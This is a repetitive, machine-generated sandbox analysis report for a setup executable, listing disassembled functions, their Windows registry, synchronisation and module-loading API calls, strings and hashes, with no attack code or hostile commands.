                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$InstanceTargetType$Offset$CompleteException@8ObjectThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                  • String ID: Bad dynamic_cast!
                                                                                                                                  • API String ID: 528452320-2956939130
                                                                                                                                  • Opcode ID: 75aec7517bcdc86fb8192a752cb9b581736ce321c566488f88f9b687ac2a3204
                                                                                                                                  • Instruction ID: 82e0feacc74bb4433bd47b36fd676ada300c347e9ce6c6fe4a6f050c3c8f6072
                                                                                                                                  • Opcode Fuzzy Hash: 75aec7517bcdc86fb8192a752cb9b581736ce321c566488f88f9b687ac2a3204
                                                                                                                                  • Instruction Fuzzy Hash: D721C9729042099FCB1CDEA9DC41AAEFB78AF58615F140029F90197198DB75D900CBA9
                                                                                                                                  Function 0106E7B0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 270registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,0131A974,00000000,?,?,?,?), ref: 0106E8FC
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,0131A974,00000000,00000000,?,00000400), ref: 0106E9CF
                                                                                                                                  Strings
                                                                                                                                  • ncvector<struct ActCodeKeyInfo>::operator [], xrefs: 0106EBFB
                                                                                                                                  • !af_, xrefs: 0106EBD8, 0106EC00
                                                                                                                                  • datavect<struct ActCodeKeyInfo *>::operator [], xrefs: 0106EBE7
                                                                                                                                  • datavect<struct ActCodeKeyInfo *>::size, xrefs: 0106EBD3
                                                                                                                                  • !af_ && i<s_, xrefs: 0106EBEC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: OpenQueryValue
                                                                                                                                  • String ID: !af_$!af_ && i<s_$datavect<struct ActCodeKeyInfo *>::operator []$datavect<struct ActCodeKeyInfo *>::size$ncvector<struct ActCodeKeyInfo>::operator []
                                                                                                                                  • API String ID: 4153817207-2240726133
                                                                                                                                  • Opcode ID: 6757a1bab9ca8e7692388d3314849d4399e8a6d947868f1e3a03e4a3b6ce4b74
                                                                                                                                  • Instruction ID: a31a55475ce049677e7b5d63bddb5f9c00efe4c79d90dc205b9f8380a8b75da3
                                                                                                                                  • Opcode Fuzzy Hash: 6757a1bab9ca8e7692388d3314849d4399e8a6d947868f1e3a03e4a3b6ce4b74
                                                                                                                                  • Instruction Fuzzy Hash: E9C129B4900269DFDB64CF58CD94B9EBBB8AF44305F0040E9D649A7282DB746E88CF65
                                                                                                                                  Function 00E6F520 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 177registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,?,?,?,00000004,00000000), ref: 00E6F5BE
                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,00000000,?,?,00000000,00000002,00000000,00000000,?,460C02D8,?,?), ref: 00E6F6EA
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6F73F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$DeleteException@8Throw
                                                                                                                                  • String ID: NumCast$RegDeleteValueW()$RegSetValueExW()$value >= 0
                                                                                                                                  • API String ID: 2269677152-3701542799
                                                                                                                                  • Opcode ID: b7b71aec19089772a49d198dcae6e1c79b20a78bd6ccb3249278958b68334c3a
                                                                                                                                  • Instruction ID: 658a7d3ce0293ad6c6f7b120acfa8b1eb6e926152b45b1194a1eea78fb0c8f4f
                                                                                                                                  • Opcode Fuzzy Hash: b7b71aec19089772a49d198dcae6e1c79b20a78bd6ccb3249278958b68334c3a
                                                                                                                                  • Instruction Fuzzy Hash: CF61CC70A00249EFDF14DFA4E945BAEBBF5FF44714F104169E815BB281DB756A08CB90
                                                                                                                                  Function 00E51860 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,460C02D8,460C02D8), ref: 00E5188F
                                                                                                                                  Strings
                                                                                                                                  • WaitForSingleObject() returned unexpected result 0x, xrefs: 00E51933
                                                                                                                                  • WaitForSingleObject(), xrefs: 00E518EC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSingleWait
                                                                                                                                  • String ID: WaitForSingleObject()$WaitForSingleObject() returned unexpected result 0x
                                                                                                                                  • API String ID: 24740636-4160024324
                                                                                                                                  • Opcode ID: 5f97169703a41eb6cc18e5379c54b59a26902148c525dcfaab8a820bcbb931b6
                                                                                                                                  • Instruction ID: 0479e4cbcda67e23b05787c4fccc0b35e686dd008f8ce78de5b40401958bdfb4
                                                                                                                                  • Opcode Fuzzy Hash: 5f97169703a41eb6cc18e5379c54b59a26902148c525dcfaab8a820bcbb931b6
                                                                                                                                  • Instruction Fuzzy Hash: 02310871D04248AFDB24EB64EC06FDDBBA8FB05724F0049AEF815A3681EB7569488791
                                                                                                                                  Function 00E4ED90 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(00000057,00000074), ref: 00E4EDAC
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000054,00000074), ref: 00E4EDC5
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00E4EDD7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E4EDDE
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00E4EDE7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                                                                  • API String ID: 1762409328-3024904723
                                                                                                                                  • Opcode ID: bd5eebe30d40b31a8bbe06fc9a0bf42a1fd1484917d732f0c63e368c8dc3eaac
                                                                                                                                  • Instruction ID: 3eac01c81749142ff8d3d01d6793948f533884b87987b5c2ea07b5f50b5e6cc0
                                                                                                                                  • Opcode Fuzzy Hash: bd5eebe30d40b31a8bbe06fc9a0bf42a1fd1484917d732f0c63e368c8dc3eaac
                                                                                                                                  • Instruction Fuzzy Hash: 99010431B002089BCB18AFB8FC99A6EF7B8EF48215F0005BEE81AD3344CE7169548780
                                                                                                                                  Function 00F05960 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59libraryloadertimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000008,00000000,460C02D8,00000000), ref: 00F059A9
                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000020), ref: 00F059BD
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemTimePreciseAsFileTime), ref: 00F059F1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00F059F8
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000048), ref: 00F05A09
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalInitializeSectionTime$AddressFileHandleModuleProcSystem
                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                  • API String ID: 1056315814-706389432
                                                                                                                                  • Opcode ID: 56783fecd0e8bd22f0d9b62368a4370ef1681f45517fd03d7aa7b132e6b6d1b8
                                                                                                                                  • Instruction ID: 63d74925a4e6c6f7d7b616566d91745d88bef51eb7097b1cd5ffbe437372436e
                                                                                                                                  • Opcode Fuzzy Hash: 56783fecd0e8bd22f0d9b62368a4370ef1681f45517fd03d7aa7b132e6b6d1b8
                                                                                                                                  • Instruction Fuzzy Hash: 72218EB1900705EBC724DF69D848B8ABBF8FB09724F10466EE45193A80D7B9B544CB90
                                                                                                                                  Function 00E4EE30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,0131A978,?,00000000,?,00E4E2F9,00000107,?,?,00000000), ref: 00E4EE43
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0131A978,?,00000000,?,00E4E2F9,00000107,?,?,00000000), ref: 00E4EE55
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E4EE5C
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0131A978,?,00000000,?,00E4E2F9,00000107,?,?,00000000), ref: 00E4EE65
                                                                                                                                  • SetLastError.KERNEL32(00000078,?,0131A978,?,00000000,?,00E4E2F9,00000107,?,?,00000000), ref: 00E4EE92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                  • API String ID: 1762409328-1816364905
                                                                                                                                  • Opcode ID: 5aa286ddc7694777170956711e5283dae502fde13326480726cb0b8bda5ba57a
                                                                                                                                  • Instruction ID: 5376320bcf25485a30d54a14c6c215310dc5c4459facb7e6ed84c8feb132fa67
                                                                                                                                  • Opcode Fuzzy Hash: 5aa286ddc7694777170956711e5283dae502fde13326480726cb0b8bda5ba57a
                                                                                                                                  • Instruction Fuzzy Hash: FEF0F97175020867C718ABB9BC9996EF7E9EB8821170105BEF51AC3244CE7568048790
                                                                                                                                  Function 00E4EEB0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 47libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E4EEC3
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection), ref: 00E4EED5
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E4EEDC
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00E4EEE5
                                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 00E4EF0D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 1762409328-3689287502
                                                                                                                                  • Opcode ID: bf8ba8b68b9770080861920b46cef14cd2328cae7f691aac80aab303fe87064c
                                                                                                                                  • Instruction ID: 0f3b7fb8a6d26068d7b52d9aa0df206dc2830c7755f328e92fa02c0bfd7b1be3
                                                                                                                                  • Opcode Fuzzy Hash: bf8ba8b68b9770080861920b46cef14cd2328cae7f691aac80aab303fe87064c
                                                                                                                                  • Instruction Fuzzy Hash: 9CF0A93575420897C72CABB9BC9987EB7A9EB8921170105BEF51AC3244CE7568048790
                                                                                                                                  Function 00E4EF30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 47libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E4EF43
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection), ref: 00E4EF55
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E4EF5C
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00E4EF65
                                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 00E4EF8D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
